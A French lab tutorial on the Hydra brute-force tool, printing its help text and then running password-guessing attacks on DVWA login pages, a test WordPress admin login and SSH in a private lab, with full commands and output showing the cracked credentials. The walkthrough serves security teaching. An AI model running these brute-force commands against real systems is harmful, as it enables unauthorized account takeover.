Présentation de l'outils :

Hydra est un outil de brute force de mot de passe. Il supporte un grand nombre de services : asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Pré-requis :

Une machine avec hydra (attaquant) et un serveur avec DVWA (cible). Dans cette démo nous utiliserons comme cible un serveur web remplis de bug de code DVWA (Damn Vulnerable Web App) en niveau de sécurity low. Au lieu de faire une installation compléte nous utiliserons la distribution Web Security Dojo 2.

Architecture du test :

Archi_Hydra

Syntaxe de la commande :

# hydra  -h
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to be attacked in parallel, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -U        service module usage details
  server    the target server (use either this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-hydra
These services were not compiled in: sapr3 afp ncp oracle.

Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy.
E.g.:  % export HTTP_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
       % export HTTP_PROXY_HTTP=http://proxy:8080
       % export HTTP_PROXY_AUTH=user:pass

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5

Dans cette exemple on utilisera l'une des syntaxes suivantes : hydra -l COMPTE_UTILISATEUR -P FICHIER_DICO -v -V ADDR_IP METHODE_FORM "URL:VARIABLES:CONDITION_ECHEC" ou hydra -l COMPTE_UTILISATEUR -P FICHIER_DICO -v -V ADDR_IP METHODE_FORM "URL:VARIABLES:S=CONDITION_SUCCES"

Test de la page de login de DVWA :

On va brute forcer la page de login de l'application. On par du principe qu'il y a un compte admin. Il faut connaître les différentes variables passées en argument, pour cela il y a deux méthodes : On édite le code source de la page et/ou on fait un test de connexion au hasard et utiliser Live Header ou FireBug. Pour la partie code source :

<form action="login.php" method="post">
   <fieldset>
      <label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />
      <label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />
      <p class="submit"><input type="submit" value="Login" name="Login"></p>
   </fieldset>
</form>

On voit que le formulaire est login.php, la méthode est POST, l'argument username, password et le bouton Login.

On fait un test de connexion pour connaître la chaine d'échec : Login failed. Le login/mot de passe (admin/password) est connu mais le but ici est de démontrer l'utilisation de Hydra. On crée un fichier dico.txt qui va contenir une liste de mot de passe dont le bon. Avec la commande vue précédemment, on obtient cela (depuis le poste attaquant) :

# hydra  -l admin -P dico.txt -v -V 192.168.5.40 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-15 22:46:27
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service http-post-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "toto" - 1 of 5 [child 0]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "titi" - 2 of 5 [child 1]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "tata" - 3 of 5 [child 2]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "1234" - 4 of 5 [child 3]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "password" - 5 of 5 [child 4]
[VERBOSE] Page redirected to http://192.168.5.40/dvwa/login.php
[VERBOSE] Page redirected to http://192.168.5.40/dvwa/login.php
[VERBOSE] Page redirected to http://192.168.5.40/dvwa/index.php
[STATUS] attack finished for 192.168.5.40 (waiting for children to complete tests)
[VERBOSE] Page redirected to http://192.168.5.40/dvwa/login.php
[VERBOSE] Page redirected to http://192.168.5.40/dvwa/login.php
[80][www-form] host: 192.168.5.40   login: admin   password: password  <==== le bon login/mot de passe
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-05-15 22:46:28

Passons maintenant à la page "Brute Force de l'application" :

Toujours dans la même configuration, nous allons tester la partie Brute force du site URL= http://192.168.5.40/dvwa/vulnerabilities/brute/ Il faut faire un test pour récupérer la chaine d'échec et lancer un firebug pour voir les différents headers qui peuvent servir, ici le header Cookie.

<form action="#" method="GET">
    Username:<br><input type="text" name="username"><br>
    Password:<br><input type="password" AUTOCOMPLETE="off" name="password"><br>
    <input type="submit" value="Login" name="Login">
</form>

On a une méthode GET.
Il faut faire un test pour récupérer la chaine d'échec et lancer un firebug pour voir les différents headers qui peuvent servir, ici le header Cookie.

# hydra -l admin -P dico.txt -v -V 192.168.5.40 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=s1cpqi893871j08mbaiv4lu5s0"

Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-15 22:57:50
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service http-get-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "toto" - 1 of 5 [child 0]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "titi" - 2 of 5 [child 1]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "tata" - 3 of 5 [child 2]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "1234" - 4 of 5 [child 3]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "password" - 5 of 5 [child 4]
[80][www-form] host: 192.168.5.40 login: admin password: password <==== BINGO !!!
[STATUS] attack finished for 192.168.5.40 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-05-15 22:57:50

Brute force de la page d'administration de Word Press :

Nous partirons du principe que l'on a un WordPress de test déjà installé et fonctionnel, l'architecture ne change pas par rapport aux tests précédent. Le login/mot de passe de l'interface d'admin est alasta/monpasse.

Le code source nous donne ceci :

<form name="loginform" id="loginform" action="http://192.168.5.40/wp/wordpress/wp-login.php" method="post">
    <p>
        <label for="user_login">Identifiant<br />
	<input type="text" name="log" id="user_login" class="input" value="" size="20" /></label>
    </p>
    <p>
	<label for="user_pass">Mot de passe<br />
	<input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
    </p>
    <p class="forgetmenot"><label for="rememberme"><input name="rememberme" type="checkbox" id="rememberme" value="forever"  /> Se souvenir de moi</label></p>
    <p class="submit">
	<input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Connexion" />
	<input type="hidden" name="redirect_to" value="http://192.168.5.40/wp/wordpress/wp-admin/" />
	<input type="hidden" name="testcookie" value="1" />
    </p>
</form>

Les informations vraiment utilent sont log (compte utilisateur) et psd (le mot de passe).
Voici la commande à utiliser (fichier dico modifié) :

# hydra  -l alasta -P dico.txt -v -V 192.168.5.40 http-post-form "/wp/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:ERREUR"
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-17 15:34:48
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 7.
[DATA] 7 tasks, 1 server, 7 login tries (l:1/p:7), ~1 try per task
[DATA] attacking service http-post-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "test" - 1 of 7 [child 0]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "toto" - 2 of 7 [child 1]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "1234567890" - 3 of 7 [child 2]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "titi" - 4 of 7 [child 3]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "iloveyou" - 5 of 7 [child 4]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "monpasse" - 6 of 7 [child 5]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "password" - 7 of 7 [child 6]
[80][www-form] host: 192.168.5.40   login: alasta   password: monpasse     <====== le bon compte/mot de passe
[STATUS] attack finished for 192.168.5.40 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-05-17 15:34:50

Brute force de connexion SSH :

Nous allons tester un brute force SSH sur un serveur avec une liste de compte et une liste de mots de passe, c'est plus facile qu'un formulaire web :

# hydra -L listuser.txt -P dico.txt  192.168.5.10 ssh
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-17 16:20:23
[DATA] 16 tasks, 1 server, 21 login tries (l:3/p:7), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.5.10   login: alasta   password: monpasse      <==== le bon login/password
[STATUS] attack finished for 192.168.5.10 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-05-17 16:20:28